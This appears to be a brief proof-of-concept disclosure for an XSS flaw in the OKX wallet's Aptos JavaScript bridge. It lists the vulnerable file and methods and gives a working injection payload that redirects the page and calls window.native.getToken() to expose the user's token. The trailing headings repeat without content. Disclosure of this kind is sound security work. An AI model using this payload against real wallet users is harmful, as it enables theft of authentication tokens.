🚨 XSS PoC - Aptos Interface

Vulnerability Details

Interface: _aptos_ (okxInternalJSBridge)
Vulnerable File: sources/p270o/cFK.java
Vulnerable Lines: 33, 61, 65
Vulnerable Methods: requestAccounts, disconnect, connectWallets
Vulnerable Pattern: UNQUOTED ID injection

XSS Payload

Payload: 1);setTimeout(()=>{window.location='https://www.okx.com'},500);setTimeout(()=>{alert(window.native.getToken())},1000);//
Explanation: Redirects to www.okx.com after 500ms, then executes alert(window.native.getToken()) after 1000ms

🚨 XSS PoC - Aptos Interface

Vulnerability Details

XSS Payload

Test Controls

Test Results